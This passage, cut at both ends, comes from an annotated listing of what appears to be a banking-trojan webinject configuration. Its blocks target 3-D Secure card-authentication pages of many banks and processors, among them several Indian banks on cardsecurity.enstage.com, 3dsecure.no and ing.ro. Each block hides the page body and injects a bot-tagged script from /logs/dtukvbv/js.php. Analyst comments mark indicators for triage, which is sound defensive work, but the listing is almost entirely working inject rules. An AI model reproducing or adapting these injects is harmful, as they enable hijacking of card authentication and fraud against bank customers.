            host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  895. <conditions>
  896. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/IndianBank/server/AccessControlServer.*]]></url>
  897. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  898. </url>
  899. </conditions>
  900. <actions>
  901. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=enstage.indianbank. Indicators for triage: that path
            with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  902. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  903. <replacement><![CDATA[\1<style type="text/css">
  904. body {visibility: hidden; }
  905. </style>
  906. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  907. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.indianbank"></script>]]></replacement>
  908. </modify>
  909. </actions>
  910. </httpinject>
  911. <httpinject>
       <!-- Trigger: URLs on sparda.wlp-acs.com starting with /flowGlobal.wflow (allow regex,
            anchored at the start only; onget="1", onpost="1"). The acs part of the host name
            suggests an access control server for card authentication; confirm before
            attributing. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  912. <conditions>
  913. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sparda\.wlp-acs\.com/flowGlobal\.wflow.*]]></url>
  914. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  915. </url>
  916. </conditions>
  917. <actions>
  918. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=sparda. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  919. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  920. <replacement><![CDATA[\1<style type="text/css">
  921. body {visibility: hidden; }
  922. </style>
  923. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  924. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=sparda"></script>]]></replacement>
  925. </modify>
  926. </actions>
  927. </httpinject>
  928. <httpinject>
       <!-- Trigger: URLs on acs3.3dsecure.no starting with /mdpayacs/pareq (allow regex,
            anchored at the start only; onget="1", onpost="1"). Host and path point at a
            3-D Secure access control server; a separate rule in this listing covers the acs4
            host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  929. <conditions>
  930. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs3\.3dsecure\.no/mdpayacs/pareq.*]]></url>
  931. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  932. </url>
  933. </conditions>
  934. <actions>
  935. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=3dsecure.no. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  936. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  937. <replacement><![CDATA[\1<style type="text/css">
  938. body {visibility: hidden; }
  939. </style>
  940. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  941. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=3dsecure.no"></script>]]></replacement>
  942. </modify>
  943. </actions>
  944. </httpinject>
  945. <httpinject>
       <!-- Trigger: every URL on bankaljazira.cardinalcommerce.com under /transaction/ (allow
            regex, anchored at the start only and ending in .*; onget="1", onpost="1").
            Presumably a hosted card-authentication page; the URL alone does not confirm that.
            The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  946. <conditions>
  947. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://bankaljazira\.cardinalcommerce\.com/transaction/.*]]></url>
  948. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  949. </url>
  950. </conditions>
  951. <actions>
  952. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=cardinalcommerce.bankaljazira. Indicators for
            triage: that path with botid/system parameters, and the visibility:hidden style
            right after the head tag. -->
  953. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  954. <replacement><![CDATA[\1<style type="text/css">
  955. body {visibility: hidden; }
  956. </style>
  957. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  958. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.bankaljazira"></script>]]></replacement>
  959. </modify>
  960. </actions>
  961. </httpinject>
  962. <httpinject>
       <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
            /ACSWeb/EnrollWeb/KotakBank/server/AccessControlServer (allow regex, anchored at the
            start only; onget="1", onpost="1"). The bank is selected by the path segment, not the
            host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  963. <conditions>
  964. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/KotakBank/server/AccessControlServer.*]]></url>
  965. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  966. </url>
  967. </conditions>
  968. <actions>
  969. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=enstage.kotakbank. Indicators for triage: that path
            with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  970. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  971. <replacement><![CDATA[\1<style type="text/css">
  972. body {visibility: hidden; }
  973. </style>
  974. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  975. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.kotakbank"></script>]]></replacement>
  976. </modify>
  977. </actions>
  978. </httpinject>
  979. <httpinject>
       <!-- Trigger: every URL on cosacs.electrapay.com under /CosmosBank/jsp/ (allow regex,
            anchored at the start only and ending in .*; onget="1", onpost="1"). Presumably a
            hosted card-authentication page; the URL alone does not confirm that. The deny entry
            (onget="1", onpost="0") lists static asset extensions. -->
  980. <conditions>
  981. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cosacs\.electrapay\.com/CosmosBank/jsp/.*]]></url>
  982. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  983. </url>
  984. </conditions>
  985. <actions>
  986. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=electrapay. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  987. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  988. <replacement><![CDATA[\1<style type="text/css">
  989. body {visibility: hidden; }
  990. </style>
  991. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  992. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electrapay"></script>]]></replacement>
  993. </modify>
  994. </actions>
  995. </httpinject>
  996. <httpinject>
       <!-- Trigger: every URL on 3dsecure.ing.ro under /acs/auth/ (allow regex, anchored at the
            start only and ending in .*; onget="1", onpost="1"). Host and path point at a
            3-D Secure authentication page. The deny entry (onget="1", onpost="0") lists static
            asset extensions. -->
  997. <conditions>
  998. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.ing\.ro/acs/auth/.*]]></url>
  999. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1000. </url>
  1001. </conditions>
  1002. <actions>
  1003. <modify>
        <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=ing.ro. Indicators for triage: that path with
             botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1004. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1005. <replacement><![CDATA[\1<style type="text/css">
  1006. body {visibility: hidden; }
  1007. </style>
  1008. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1009. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ing.ro"></script>]]></replacement>
  1010. </modify>
  1011. </actions>
  1012. </httpinject>
  1013. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/BOB/server/AccessControlServer (allow regex, anchored at the start
             only; onget="1", onpost="1"). The regex requires /BOB/ as a full path segment, so it
             does not also cover the BOBCards path handled by the next rule. The deny entry
             (onget="1", onpost="0") lists static asset extensions. -->
  1014. <conditions>
  1015. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/BOB/server/AccessControlServer.*]]></url>
  1016. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1017. </url>
  1018. </conditions>
  1019. <actions>
  1020. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.bob. Indicators for triage: that path with
             botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1021. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1022. <replacement><![CDATA[\1<style type="text/css">
  1023. body {visibility: hidden; }
  1024. </style>
  1025. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1026. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.bob"></script>]]></replacement>
  1027. </modify>
  1028. </actions>
  1029. </httpinject>
  1030. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/BOBCards/server/AccessControlServer (allow regex, anchored at the
             start only; onget="1", onpost="1"). The bank is selected by the path segment, not
             the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1031. <conditions>
  1032. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/BOBCards/server/AccessControlServer.*]]></url>
  1033. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1034. </url>
  1035. </conditions>
  1036. <actions>
  1037. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.bobcards. Indicators for triage: that path
             with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1038. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1039. <replacement><![CDATA[\1<style type="text/css">
  1040. body {visibility: hidden; }
  1041. </style>
  1042. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1043. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.bobcards"></script>]]></replacement>
  1044. </modify>
  1045. </actions>
  1046. </httpinject>
  1047. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/DenaBank/server/AccessControlServer (allow regex, anchored at the
             start only; onget="1", onpost="1"). The bank is selected by the path segment, not
             the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1048. <conditions>
  1049. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/DenaBank/server/AccessControlServer.*]]></url>
  1050. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1051. </url>
  1052. </conditions>
  1053. <actions>
  1054. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.denabank. Indicators for triage: that path
             with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1055. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1056. <replacement><![CDATA[\1<style type="text/css">
  1057. body {visibility: hidden; }
  1058. </style>
  1059. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1060. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.denabank"></script>]]></replacement>
  1061. </modify>
  1062. </actions>
  1063. </httpinject>
  1064. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/KVB/server/AccessControlServer (allow regex, anchored at the start
             only; onget="1", onpost="1"). The bank is selected by the path segment, not the
             host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1065. <conditions>
  1066. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/KVB/server/AccessControlServer.*]]></url>
  1067. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1068. </url>
  1069. </conditions>
  1070. <actions>
  1071. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.kvb. Indicators for triage: that path with
             botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1072. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1073. <replacement><![CDATA[\1<style type="text/css">
  1074. body {visibility: hidden; }
  1075. </style>
  1076. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1077. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.kvb"></script>]]></replacement>
  1078. </modify>
  1079. </actions>
  1080. </httpinject>
  1081. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/FederalBank/server/AccessControlServer (allow regex, anchored at
             the start only; onget="1", onpost="1"). The bank is selected by the path segment,
             not the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1082. <conditions>
  1083. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/FederalBank/server/AccessControlServer.*]]></url>
  1084. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1085. </url>
  1086. </conditions>
  1087. <actions>
  1088. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.federalbank. Indicators for triage: that
             path with botid/system parameters, and the visibility:hidden style right after the
             head tag. -->
  1089. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1090. <replacement><![CDATA[\1<style type="text/css">
  1091. body {visibility: hidden; }
  1092. </style>
  1093. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1094. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.federalbank"></script>]]></replacement>
  1095. </modify>
  1096. </actions>
  1097. </httpinject>
  1098. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/UCOBank/server/AccessControlServer (allow regex, anchored at the
             start only; onget="1", onpost="1"). The bank is selected by the path segment, not
             the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1099. <conditions>
  1100. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/UCOBank/server/AccessControlServer.*]]></url>
  1101. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1102. </url>
  1103. </conditions>
  1104. <actions>
  1105. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.ucobank. Indicators for triage: that path
             with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1106. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1107. <replacement><![CDATA[\1<style type="text/css">
  1108. body {visibility: hidden; }
  1109. </style>
  1110. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1111. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.ucobank"></script>]]></replacement>
  1112. </modify>
  1113. </actions>
  1114. </httpinject>
  1115. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/IOB/server/AccessControlServer (allow regex, anchored at the start
             only; onget="1", onpost="1"). The bank is selected by the path segment, not the
             host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1116. <conditions>
  1117. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/IOB/server/AccessControlServer.*]]></url>
  1118. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1119. </url>
  1120. </conditions>
  1121. <actions>
  1122. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.iob. Indicators for triage: that path with
             botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1123. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1124. <replacement><![CDATA[\1<style type="text/css">
  1125. body {visibility: hidden; }
  1126. </style>
  1127. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1128. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.iob"></script>]]></replacement>
  1129. </modify>
  1130. </actions>
  1131. </httpinject>
  1132. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/CorporationBank/server/AccessControlServer (allow regex, anchored
             at the start only; onget="1", onpost="1"). The bank is selected by the path segment,
             not the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1133. <conditions>
  1134. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/CorporationBank/server/AccessControlServer.*]]></url>
  1135. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1136. </url>
  1137. </conditions>
  1138. <actions>
  1139. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.corporationbank. Indicators for triage:
             that path with botid/system parameters, and the visibility:hidden style right after
             the head tag. -->
  1140. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1141. <replacement><![CDATA[\1<style type="text/css">
  1142. body {visibility: hidden; }
  1143. </style>
  1144. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1145. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.corporationbank"></script>]]></replacement>
  1146. </modify>
  1147. </actions>
  1148. </httpinject>
  1149. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/JKBank/server/AccessControlServer (allow regex, anchored at the
             start only; onget="1", onpost="1"). The bank is selected by the path segment, not
             the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1150. <conditions>
  1151. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/JKBank/server/AccessControlServer.*]]></url>
  1152. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1153. </url>
  1154. </conditions>
  1155. <actions>
  1156. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.jkbank. Indicators for triage: that path
             with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1157. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1158. <replacement><![CDATA[\1<style type="text/css">
  1159. body {visibility: hidden; }
  1160. </style>
  1161. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1162. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.jkbank"></script>]]></replacement>
  1163. </modify>
  1164. </actions>
  1165. </httpinject>
  1166. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/ComBank/server/AccessControlServer (allow regex, anchored at the
             start only; onget="1", onpost="1"). The bank is selected by the path segment, not
             the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1167. <conditions>
  1168. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/ComBank/server/AccessControlServer.*]]></url>
  1169. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1170. </url>
  1171. </conditions>
  1172. <actions>
  1173. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.combank. Indicators for triage: that path
             with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1174. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1175. <replacement><![CDATA[\1<style type="text/css">
  1176. body {visibility: hidden; }
  1177. </style>
  1178. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1179. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.combank"></script>]]></replacement>
  1180. </modify>
  1181. </actions>
  1182. </httpinject>
  1183. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/SeylanBank/server/AccessControlServer (allow regex, anchored at
             the start only; onget="1", onpost="1"). The bank is selected by the path segment,
             not the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1184. <conditions>
  1185. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/SeylanBank/server/AccessControlServer.*]]></url>
  1186. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1187. </url>
  1188. </conditions>
  1189. <actions>
  1190. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.seylanbank. Indicators for triage: that
             path with botid/system parameters, and the visibility:hidden style right after the
             head tag. -->
  1191. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1192. <replacement><![CDATA[\1<style type="text/css">
  1193. body {visibility: hidden; }
  1194. </style>
  1195. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1196. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.seylanbank"></script>]]></replacement>
  1197. </modify>
  1198. </actions>
  1199. </httpinject>
  1200. <httpinject>
        <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
             /ACSWeb/EnrollWeb/AndhraBank/server/AccessControlServer (allow regex, anchored at
             the start only; onget="1", onpost="1"). The bank is selected by the path segment,
             not the host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1201. <conditions>
  1202. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/AndhraBank/server/AccessControlServer.*]]></url>
  1203. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1204. </url>
  1205. </conditions>
  1206. <actions>
  1207. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=enstage.andhrabank. Indicators for triage: that
             path with botid/system parameters, and the visibility:hidden style right after the
             head tag. -->
  1208. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1209. <replacement><![CDATA[\1<style type="text/css">
  1210. body {visibility: hidden; }
  1211. </style>
  1212. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1213. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.andhrabank"></script>]]></replacement>
  1214. </modify>
  1215. </actions>
  1216. </httpinject>
  1217. <httpinject>
        <!-- Trigger: URLs on acs4.3dsecure.no starting with /mdpayacs/pareq (allow regex,
             anchored at the start only; onget="1", onpost="1"). Host and path point at a
             3-D Secure access control server; a separate rule in this listing covers the acs3
             host with the same path. The deny entry (onget="1", onpost="0") lists static asset
             extensions. -->
  1218. <conditions>
  1219. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs4\.3dsecure\.no/mdpayacs/pareq.*]]></url>
  1220. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1221. </url>
  1222. </conditions>
  1223. <actions>
  1224. <modify>
        <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=3dsecure.no.acs4. Indicators for triage: that path
             with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1225. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  1226. <replacement><![CDATA[\1<style type="text/css">
  1227. body {visibility: hidden; }
  1228. </style>
  1229. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
